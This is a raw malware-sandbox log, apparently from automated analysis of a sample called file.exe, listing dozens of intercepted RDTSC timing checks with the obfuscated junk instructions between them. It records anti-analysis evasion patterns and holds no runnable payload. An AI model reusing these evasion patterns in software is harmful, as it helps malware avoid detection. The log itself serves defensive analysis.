Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC960 second address: 9DC966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DF693 second address: 9DF6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DF107 second address: 9DF110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6613 second address: 9E6618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6618 second address: 9E661E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EAC30 second address: 9EAC45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006911h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBF3C second address: 9FBF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBF40 second address: 9FBF75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA1ED006917h 0x0000000f jo 00007FA1ED006918h 0x00000015 jmp 00007FA1ED00690Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA827 second address: 9FA82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA82D second address: 9FA831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA831 second address: 9FA835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA835 second address: 9FA856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED006916h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA856 second address: 9FA85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA85A second address: 9FA85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA9E0 second address: 9FAA13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007FA1ECFCB296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jp 00007FA1ECFCB296h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 js 00007FA1ECFCB2C2h 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007FA1ECFCB2A0h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FAA13 second address: 9FAA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FA1ED006906h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FAE23 second address: 9FAE3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FA1ECFCB2A1h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB0E5 second address: 9FB102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006919h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB102 second address: 9FB10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00EEF second address: A00F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED006916h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00F09 second address: A00F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA1ECFCB29Bh 0x0000000f jl 00007FA1ECFCB296h 0x00000015 jmp 00007FA1ECFCB2A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00A8F second address: A00A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0306B second address: A03072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E4F1 second address: A0E4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E4F6 second address: A0E4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E35F second address: A0E38F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA1ED006906h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FA1ED006914h 0x00000014 jnl 00007FA1ED00690Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A112A2 second address: A112A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A112A6 second address: A112AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A112AC second address: A112B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A112B0 second address: A112C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1ED006906h 0x00000008 jns 00007FA1ED006906h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A112C4 second address: A112C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13AC2 second address: A13AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13AC8 second address: A13AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13AD0 second address: A13AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CD4B second address: A0CD51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CD51 second address: A0CD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007FA1ED006906h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FA1ED00690Ch 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0CD78 second address: A0CD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA1ECFCB2A5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26FA8 second address: A26FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26FC5 second address: A26FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26FCB second address: A26FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26FD1 second address: A2700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA1ECFCB296h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push edx 0x0000000e jmp 00007FA1ECFCB2A4h 0x00000013 jmp 00007FA1ECFCB29Bh 0x00000018 pop edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e jnl 00007FA1ECFCB296h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26AAD second address: A26AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA1ED006906h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1ED006918h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26AD2 second address: A26ADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FA1ECFCB296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C69 second address: A26C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FA1ED006906h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C79 second address: A26C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C8A second address: A26CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FA1ED006906h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA1ED006911h 0x00000012 jmp 00007FA1ED006916h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FA1ED006918h 0x00000022 push eax 0x00000023 pop eax 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 jmp 00007FA1ED006912h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26CF3 second address: A26D09 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1ECFCB29Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007FA1ECFCB296h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB07 second address: A3EB18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jl 00007FA1ED006906h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB18 second address: A3EB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EB1D second address: A3EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EE47 second address: A3EE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EE4D second address: A3EE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F11C second address: A3F124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F50B second address: A3F50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F965 second address: A3F969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F969 second address: A3F96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42626 second address: A4262C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4262C second address: A42630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4290A second address: A4290E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4290E second address: A42929 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1ED00690Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A42C6D second address: A42C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47620 second address: A4766B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA1ED00690Ah 0x0000000a pushad 0x0000000b jmp 00007FA1ED006918h 0x00000010 jmp 00007FA1ED00690Eh 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA1ED00690Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4766B second address: A4766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4766F second address: A47681 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007FA1ED006906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A47681 second address: A47685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01AF second address: 51C01BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ED00690Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01BF second address: 51C01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01CF second address: 51C01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01D5 second address: 51C01D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01D9 second address: 51C01FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1ED006917h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C01FF second address: 51C0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0205 second address: 51C020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C020B second address: 51C022E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FA1ECFCB29Ah 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA1ECFCB29Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C022E second address: 51C0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0E33 second address: 51E0E68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ECFCB2A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0E68 second address: 51E0E6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0E6E second address: 51E0E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1ECFCB2A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0E8F second address: 51E0EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1ED006911h 0x00000009 and cx, 2786h 0x0000000e jmp 00007FA1ED006911h 0x00000013 popfd 0x00000014 mov ecx, 780F6137h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA1ED006919h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0EE0 second address: 51E0EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0EE6 second address: 51E0EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0EEA second address: 51E0F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1ECFCB2A2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0F07 second address: 51E0F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E0F0D second address: 51E0F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180181 second address: 5180199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ED006914h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0BDD second address: 51A0C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA1ECFCB2A1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA1ECFCB2A3h 0x00000019 adc cx, 40BEh 0x0000001e jmp 00007FA1ECFCB2A9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FA1ECFCB2A0h 0x0000002a jmp 00007FA1ECFCB2A5h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0C63 second address: 51A0CB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 pushfd 0x00000006 jmp 00007FA1ED006918h 0x0000000b adc ecx, 64BC0B48h 0x00000011 jmp 00007FA1ED00690Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007FA1ED006916h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0CB5 second address: 51A0CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0CB9 second address: 51A0CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0802 second address: 51A0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0806 second address: 51A080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A080C second address: 51A0811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0723 second address: 51A0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0729 second address: 51A072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A072D second address: 51A073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A073C second address: 51A074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A074D second address: 51A0753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0753 second address: 51A0757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0757 second address: 51A075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
